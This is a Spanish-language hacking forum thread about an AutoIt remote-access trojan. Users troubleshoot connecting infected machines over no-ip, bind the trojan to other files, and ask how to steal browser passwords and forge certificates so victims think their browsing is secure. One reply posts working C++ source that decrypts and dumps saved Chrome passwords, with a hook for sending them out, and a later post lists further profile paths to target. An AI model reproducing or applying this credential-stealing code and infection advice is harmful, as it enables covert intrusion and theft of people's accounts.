Indetectables

Ando pendiente de la actualizaccion , intentare subir por estes dias

Gracias a todos por los comentarios


megahacker15

No ofendes bro , de forma ninguna , autoit no es mult thread , quizas por eso no te guste tanto e genere algunos errores en algunas funciones , algo que arreglare pronto

Sobre la conexion ,estas cierto , la nueva version v9 no se pierdem remotos , tengo como + de 400

Un saludo a todos

M3, no se descarga el rar, me dice archivo no disponible.

Hola buenas, gracias al creador de esta herramienta ya que tiene buenisima pinta, de hecho me registre expresamente para poder bajármela y probarla.

Lo hice y lo configuré todo como se debe...pero por mas pruebas y pruebas que hice...no hay manera de que conecte el servidor (que soy yo mismo con mi portátil conectado a otro wifi).

Estoy segurisimo que lo hago todo como se indica en el hilo, he usado el puerto 1604, el cual ya abrí otro día porque no me funcionaba el androirat, fue abrirlo y funcionó...así que bien abierto esta...Aun así abrir unos pocos de puertos mas y fui probandolos y nada...el no-ip lo tengo bien configurado por lo mismo...sino el androrat no me habría funcionado..

Y es que no se que mas puede ser...por que es tan simple, al menos como aqui lo explicáis, que no hay mas opciones que haya podido hacer mal...os dejo una captura de como lo tengo puesto para que lo veías...



Primero probé con otro host del no-ip, que terminaba en no-ip.ORG...pero como no funcionaba probé con el que se ve en la captura ya que era como el de los ejemplo de aquí (ddns.net) por si iba así, pero tampoco.

El programita del no-ip tiene los 3 check en verde, pero no se ve.

Alguna sugerencia de cual puede ser el fallo??

La unica duda que tendria, por que como digo son apenas 3 o 4 pasos a seguir solo...seria a la hora de compilar el server...yo lo hago así :



Donde pongo el recuadro es que no se a que asociarlo...solo me deja elegir extensión .ex o .a3x , (pensaba que se podia unir a una foto por ejmplo pero no) así que no pongo nada, y en imagen tampoco...como X64 indica que no funciona, supongo que por defecto viene en X86 asi que no toco nada...
Y no sale ningun fallo ni nada, pone completado, por lo que entiendo que se hizo correctamente...

Donde podia estar el problema??Muchas gracias.!

Espero que no les moleste ya que soy usuario nuevo y venir así directo a preguntar y tal igual puede molestar...

Bueno por la primera parte...yo uso el rat y veo que lo tienes todo bien , puerto abierto correctamente.... aunque tendrías que abrir los que dice el creador en el "README" 531 hasta 534 porque te pueden hacer falta por lo que se explica en la docu.

La segunda parte.... de copilar el rat, la casilla que dices tienes que poner una ruta completa a un archivo para que lo cree , yo lo hago con extensión exe , si el archivo no existe, da igual, te lo crea, si existe te lo sobrescribirá .

Por otro lado para solapar el rat a otro archivo hay que usar un binder , esa aplicación no es para eso.

Espero haberte ayudado en algo.... saludos.

rafax escribió:Bueno por la primera parte...yo uso el rat y veo que lo tienes todo bien , puerto abierto correctamente.... aunque tendrías que abrir los que dice el creador en el "README" 531 hasta 534 porque te pueden hacer falta por lo que se explica en la docu.

La segunda parte.... de copilar el rat, la casilla que dices tienes que poner una ruta completa a un archivo para que lo cree , yo lo hago con extensión exe , si el archivo no existe, da igual, te lo crea, si existe te lo sobrescribirá .

Por otro lado para solapar el rat a otro archivo hay que usar un binder , esa aplicación no es para eso.

Espero haberte ayudado en algo.... saludos.

Hola buenas, muchas gracias por tu respuesta!

SI te fijas en la primera imagen, se ve que tengo todos esos puertos que me indicas abiertos (los del README), pero que solo le puse el recuadro rojo al 1604, por lo que comentaba que lo use sin problemas con el AndroRAT.

Así que sigo sin entender por qué no me va...he seguido probando otras opciones y nada...a cambiar de puertos, de dominio no-ip... pero nada no hay forma... y como digo...al ser tan simple no se que mas puede estar fallando, alguien mas me puede iluminar??'

Gracias de antemano.

Un saludo!

Bueno yo lo tengo y me funciona solo con eso , el problema que tuve es para hacer pruebas desde mi maquina con una virtual que fue imposible conectar con no-ip y si por ip local , prueba el rat infectando una maquina desde otra red., debería funcionar...

que ganas de que M3 suba la actualización

Que version es la del compilador, quiero usar la misma versión de AutoIt3.exe para hacerlo funcionar con ese ejecutable.

No funciona en wndows10, no se conecta.
En windows 7 x64 sin problema.

Gracias por la info exclente

Buenas, parece un buen troyano. Aunque en mi opinión es fácilmente detectable ya que el no-ip corresponde a tu ordenador y con un simple bot podrían detectar tu ip, es por eso que no apostaría por ese tipo de troyanos, por muy sencillos y eficaces que sean. Yo prefiero optar por troyanos P2P con protocolos propios y actualizaciones, eso es lo mejor para la privacidad, y si es en C++ mejor, ya que no depende de .NET y se puede hacer inyección de DLL con el.

Estoy creando un troyano con las características que ya mencioné y algunas más muy poco frecuentes en un troyano, pero sin embargo, me llama la curiosidad como es capaz de capturar las contraseñas de chrome y firefox, ¿como se hace? Me gustaría aplicarlo a mi troyano.

También, estaría bien saber como instalar un certificado falso en firefox o chrome para falsificar el certificado en las páginas web, haciendoles creer que su navegación es segura cuando no lo es.

Saludos.

Mentor escribió:Aunque en mi opinión es fácilmente detectable ya que el no-ip corresponde a tu ordenador y con un simple bot podrían detectar tu ip, es por eso que no apostaría por ese tipo de troyanos, por muy sencillos y eficaces que sean. Yo prefiero optar por troyanos P2P con protocolos propios y actualizaciones, eso es lo mejor para la privacidad, y si es en C++ mejor, ya que no depende de .NET y se puede hacer inyección de DLL con el.

Creo que deberias informarte un poco de lo que hablas, pues parece que ni tu mismo sabes que dices.

//Regards.

Scorpio escribió:

Mentor escribió:Aunque en mi opinión es fácilmente detectable ya que el no-ip corresponde a tu ordenador y con un simple bot podrían detectar tu ip, es por eso que no apostaría por ese tipo de troyanos, por muy sencillos y eficaces que sean. Yo prefiero optar por troyanos P2P con protocolos propios y actualizaciones, eso es lo mejor para la privacidad, y si es en C++ mejor, ya que no depende de .NET y se puede hacer inyección de DLL con el.

Creo que deberias informarte un poco de lo que hablas, pues parece que ni tu mismo sabes que dices.

//Regards.

Olee!!

Mentor escribió:Buenas, parece un buen troyano. Aunque en mi opinión es fácilmente detectable ya que el no-ip corresponde a tu ordenador y con un simple bot podrían detectar tu ip, es por eso que no apostaría por ese tipo de troyanos, por muy sencillos y eficaces que sean. Yo prefiero optar por troyanos P2P con protocolos propios y actualizaciones, eso es lo mejor para la privacidad, y si es en C++ mejor, ya que no depende de .NET y se puede hacer inyección de DLL con el.

Estoy creando un troyano con las características que ya mencioné y algunas más muy poco frecuentes en un troyano, pero sin embargo, me llama la curiosidad como es capaz de capturar las contraseñas de chrome y firefox, ¿como se hace? Me gustaría aplicarlo a mi troyano.

También, estaría bien saber como instalar un certificado falso en firefox o chrome para falsificar el certificado en las páginas web, haciendoles creer que su navegación es segura cuando no lo es.

Saludos.

No-Ip no vincula a ningún PC sino a IPs (dinámicas normalmente). AutoIt tampoco tiene dependencias y se pueden hacer inyecciones DLL también. Si avanzas en la comunicación P2P me gustaría echarle un vistazo (si es posible) ya que no he encontrado ninguna implementación orientada al malware.

Para la recuperación de contraseñas, para chrome es bastante fácil porque en casi todas las versiones es lo mismo pero con Firefox será más complicado. Cada pocas versiones cambia la forma de guardar las credenciales. Te dejo un source para recuperar las contraseñas de Chrome que hice basándome en un source que encontré.

ChromeRecovery.cpp

#include "ChromeRecovery.hpp"

void GetGoogleChrome(CHROME_VER CVer) {

    char szPath[MAX_PATH];
    sqlite3 *lpDatabase;
    sqlite3_stmt *lpStatement;
    const char *lpTail;
    char *szURL, *szUsername, *szPassword, *szSource;
    DATA_BLOB DataIn, DataOut;

    _bSHGetSpecialFolderPathA(0, szPath, 0x1C, 0);
    switch(CVer) {
    case CHROMEOLD:
        strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Web Data");
        szSource = "ChromeOld";
        break;
    case CHROMENEW:
        strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Login Data");
        szSource = "ChromeNew";
        break;
    }

    if(GetFileAttributes(szPath) != 0xFFFFFFFF) {
        sqlite3_open(szPath, &lpDatabase);
        sqlite3_prepare_v2(lpDatabase, "SELECT * FROM logins", 20, &lpStatement, &lpTail);
        do {
            DataIn.pbData = (LPBYTE)sqlite3_column_blob(lpStatement, 5);
            DataIn.cbData = sqlite3_column_bytes(lpStatement, 5);
            if(CryptUnprotectData(&DataIn, 0, 0, 0, 0, 8, &DataOut)) {
                szURL = (char*)sqlite3_column_text(lpStatement, 0);
                szUsername = (char*)sqlite3_column_text(lpStatement, 3);
                szPassword = (char*)DataOut.pbData;
                szPassword[DataOut.cbData] = '\0';
                cout << "\tURL: " << szURL << endl << "\t\tUser: " << szUsername << endl << "\t\tPassword: " << szPassword << endl;

#ifndef TEST
                //SendCredential(szSource, szURL, szUsername, szPassword);
#endif // TEST
            }
        } while(sqlite3_step(lpStatement) == SQLITE_ROW);

        sqlite3_close(lpDatabase);
        LocalFree(DataIn.pbData);
        LocalFree(DataOut.pbData);
    }
}

ChromeRecovery.hpp

#ifndef __CHROME__
#define __CHROME__

#include <iostream>
#include <fstream>
#include <windows.h>
#include <Wincrypt.h>
#include "sqlite3.h"
#include "Util.hpp"

using namespace std;

typedef BOOL ( __stdcall * bSHGetSpecialFolderPathA) (HWND, LPTSTR, int, BOOL);
bSHGetSpecialFolderPathA _bSHGetSpecialFolderPathA = bSHGetSpecialFolderPathA(GetProcAddress(LoadLibraryA("Shell32.dll"), "SHGetSpecialFolderPathA"));

enum CHROME_VER { CHROMEOLD, CHROMENEW};
void GetGoogleChrome(CHROME_VER CVer);

#endif // __CHROME__

[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]

Para lo de los certificados, supongo que tendrás que hookear algunas APIs del navegador.

Blau tambien hay que tomar en cuenta que google ahora implementa perfiles.

\\Google\\Chrome\\User Data\\Default\\Login Data
\\Google\\Chrome\\User Data\\Profile 1\\Login Data
\\Google\\Chrome\\User Data\\Profile 2\\Login Data
\\Google\\Chrome\\User Data\\Profile N\\Login Data